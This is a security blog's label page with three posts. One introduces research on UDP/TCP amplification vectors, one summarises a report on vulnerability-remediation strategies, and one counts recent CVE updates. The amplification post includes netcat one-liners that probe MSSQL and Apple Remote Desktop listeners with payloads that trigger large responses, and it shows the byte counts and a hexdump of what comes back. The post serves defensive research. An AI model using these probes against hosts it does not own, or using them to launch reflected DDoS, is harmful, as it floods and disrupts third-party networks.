Showing posts with label [VulnResearch]. Show all posts
Showing posts with label [VulnResearch]. Show all posts

Oct 12, 2022

Amplification Research

Tags: ,

AMP-Research is a research on exotic UDP/TCP amplification vectors, payloads and mitigations.

Amplification is where a simple malformed socket or packets request elicit a response larger than the input data. This can be abused to "amplify" a request, by means of Distributed Reflected Denial of Service (DRDoS) attacks or DDoS. 

Best way to show what this means is using the network protocol MSSQL over TCP/IP UDP port 1434 (23 times amplification factor) as an example.

$ echo -ne '\x02' | nc -u -q 2 190.xx.xx.xx 1434|xxd -p|wc -c
629 bytes

Another example on ARD (Apple Remote Desktop) listener:

$ echo -ne '\x00\x14\x00\x01\x03' |nc -u 89.xx.xx.xx 3283|hexdump
0000000 0100 ea03 3100 0000 0000 0000 0000 0000
0000010 0000 0000 0000 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 0100 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 0000 0000
_
0000050 0000 1200 0000 0000 0000 0000 0000 0000
0000060 0000 0000 0000 0000 0000 0000 0000 0000
0000070 0000 0000 0000 0000 0000 0000 0000 640a
0000080 7461 6861 6565 6472 0034 0000 0000 0000
0000090 0000 0000 0000 0000 0000 0000 0000 0000
_
00000c0 0000 0001 0000 0000 0000 0000 0000 0000
00000d0 0000 0000 0000 9803 0000 0100 18f0 ed98
00000e0 9288 0000 0000 0a00 6400 6100 7400 6100
00000f0 6800 6500 6500 7200 6400 3400 0000 0000
0000100 0000 0000 0000 0000 0000 0000 0000 0000


Links:

Sep 1, 2021

Analyzing Vulnerability Remediation Strategies

Tags: , ,

Prioritization to Prediction Volume 1: Analyzing Vulnerability Remediation Strategies


Effective remediation depends on quickly determining which vulnerabilities warrant action and which of those have highest priority, but prioritization remains one of the biggest challenges in vulnerability management. 

For the first time, Kenna Security and the Cyentia Institute took a quantitative look at the effectiveness of common remediation strategies and used that data as a baseline to compare against a cutting-edge predictive model.

The results of this research are detailed in the new report, Prioritization To Prediction: Analyzing Vulnerability Remediation Strategies.

  1. Vulnerability Lifecycle
  2. Vulnerability Prioritization
  3. Exploitation Timeline
  4. Exploit Prediction Model

 

Links:

Apr 22, 2021

What Happen in the Past-14-Day?

Tags: , ,

Do you know how many new CVE have been added to NVD in the past 2 weeks? And how many old CVE have been updated, like new poc exploit released or malware released? How about ransomware and crypto-mining attack?

The answer is 10,768 CVE have been updated. 

10,768 CVE updated in past 14 days

 This includes:

  • New CVE been released.
  • Old CVE with new details being released.
  • Any pre-NDV vulnerabilities

Yes, you may get those information from National Vulnerability Database. However, how are you going to do a quick analysis of all those CVE, like:

  • What is the trend and velocity of a particular CVE being attack now?
  • What are the new exploit being released? 
  • Any malware or ransomware being released for a CVE?
  • Any prediction on a particular CVE with artificial intelligence analysis on how likely a particular CVE is going to be exploited in the future.

Finally, how fast you learn about all these new CVE/attack/ransomware/cryptomining? 

(Below is the quick dump of all the information above into a CSV file. And it just happen that while I exporting the CSV, the list becomes 10769 CVE)

10,769 cve exported

Subscribe to: Posts (Atom)